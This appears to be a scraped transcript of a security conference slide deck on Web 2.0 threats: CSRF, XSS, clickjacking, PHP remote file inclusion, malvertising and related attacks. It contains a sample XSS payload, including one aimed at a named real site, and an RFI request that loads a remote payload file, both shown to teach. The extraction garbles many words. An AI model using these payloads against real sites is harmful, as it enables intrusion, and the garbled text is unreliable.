Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd...
Transcript of Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd...
![Page 1: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/1.jpg)
Web 2.0 Threats Illustrated
![Page 2: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/2.jpg)
About Me
R b t H CEORobert Hansen - CEOSecTheory Ltd
Bespoke Boutique Internet SecurityBespoke Boutique Internet SecurityWeb Application/Browser SecurityNetwork/OS Securityhttp://www.sectheory.com/
FallingRock NetworksAdvisory capacity to start-upsFounded the web application Founded the web application security lab
http://ha.ckers.org/ - the labhtt // l k / th fhttp://sla.ckers.org/ - the forum
![Page 3: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/3.jpg)
![Page 4: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/4.jpg)
P i S O i i P liPrimer on Same Origin Policy
URL Outcome Reason
http://www.yoursite.com/dir/page.html Success Same domain
http://www.yoursite.com/dir2/other‐page.html Success Same domain
https://www.yoursite.com/ Failure (Except Cookies)
Different protocol
h // i 8080/ F il (E Diffhttp://www.yoursite.com:8080/ Failure (Except Cookies)
Different port
http://news.yoursite.com/blog/ Failure (Except Cookies)
Different host
![Page 5: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/5.jpg)
CSRFCSRF• Cross domain
images/iframes/CSS/JS images/iframes/CSS/JS calls, etc…
• Difference between Difference between malicious and benign x-domain requests are almost impossible to tell the difference.
• GET and POST are equally vulnerable.ff l ll b• Affects nearly all websites
– banks, .gov, etc..
![Page 6: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/6.jpg)
CSRF Mitigation• Check referrer
• Turn referrer off• Meta refresh, https or JSMeta refresh, https or JS
• Use a nonce (EG: <input type "hidden" name "nonce" type="hidden" name="nonce" value="5jjkhu431ju1i8d9r14">• Make the user click on it for me or steal it
• Embed the link in a flash movie• Make the user click on it for me or steal it
![Page 7: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/7.jpg)
XSS• <input name="a" value="$var">
• $var = '"><script>alert("XSS")</script>';• <input name="a"
value=""><script>alert("XSS")</script>">p ( ) / p
• http://radhealth.usuhs.mil/medpix/medpix_cow.html?pt_id="><script>alert("XSS")</script>
• 80% of sites are vulnerable (obfuscation)• Overwrite pages, Steal cookies• Samy worm 1MM++• IE XSS filter/Noscript, et alIE XSS filter/Noscript, et al
• Helpful for affiliate cookies, phishing, etc…
![Page 8: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/8.jpg)
XSS + CSRFXSS + CSRF
• http://ha.ckers.org/xss.html
![Page 9: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/9.jpg)
Clickjacking 101
![Page 10: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/10.jpg)
Clickjacking 101
![Page 11: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/11.jpg)
Clickjacking 101• Ronald’s flash settings manager subversion• Ronald s flash settings manager subversion…
![Page 12: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/12.jpg)
Clickjacking 101• PDP’s version…
![Page 13: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/13.jpg)
Delete User AccountsDelete User Accounts
![Page 14: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/14.jpg)
Auto-purchase
![Page 15: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/15.jpg)
Buy stocks
![Page 16: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/16.jpg)
Router Reset
![Page 17: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/17.jpg)
Delete Firewall Rules
![Page 18: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/18.jpg)
Make Your Profile Public
![Page 19: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/19.jpg)
Deactivate Wordpress Plugins
![Page 20: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/20.jpg)
Digg
![Page 21: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/21.jpg)
MySpace
![Page 22: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/22.jpg)
Google Bowling to the ExtremeGoogle Bowling to the Extreme
• Slowloris…Slowloris…• DNS Cache Poisoning is
fixedfixed…• Or is it?
f• Spoof static.competitor.com and include malware
• Persistent XSS
![Page 23: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/23.jpg)
PHP File includesRobot pulls requests a pagep q p g
http://www.whatever.com/index.php?url=http://www.hacked-site.com/file.txt
Page requests the file from www.hacked-site.com which contains a simple echo statement.Site executes the content if it’s vulnerableSite executes the content if it s vulnerable.If robot sees the echo’d statement of the file it requests a new file with the real payload at www.hacked-site.com/realpayload.txtSite executes new payload and bot propagates.Simple to t n into a o mSimple to turn into a worm…Modify some 404s instead of entire site.
![Page 24: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/24.jpg)
SEO via PHP RFI
![Page 25: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/25.jpg)
Malvertizing• Sell ads on behalf of name brand companies• Time of day• Geo IP• Redirect to malware or offer malware for sale
under the guise of security softwareunder the guise of security software
![Page 26: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/26.jpg)
Future of SpammingPersonasPersonas
AgeDemographicg pMarital statusInterestsZ diZodiacBirth dateFriendsFriendsPerfect weatherLocaleEtc…
![Page 27: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/27.jpg)
Cl d f I itClouds of Insecurity
DoS, failure to segment data, access controls, going out of business… etc… etc…
![Page 28: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/28.jpg)
Lots Of Other Stuff
Inter-protocol exploitationSQL injectionHistory stealingHistory stealingDNS rebindingRFC1918 cache RFC1918 cache poisoningEtcEtc..
![Page 29: Web 2.0 Threats Illustrated - cdn.ttgtmedia.com · About Me Rb Ht Robert Hansen - CEO SecTheory Ltd Bespoke Boutique Internet Security Web Application/Browser Security Network/OS](https://reader033.fdocuments.us/reader033/viewer/2022050609/5fb0027c6eef3b20c63ac8c1/html5/thumbnails/29.jpg)
Thank you!
• Robert Hansenhttp://www sectheory com the companyhttp://www.sectheory.com – the companyhttp://ha.ckers.org – the labhttp://sla.ckers.org – the forump // gDetecting Malice – the eBookXSS Exploits – the book
b @ h h [email protected] – the email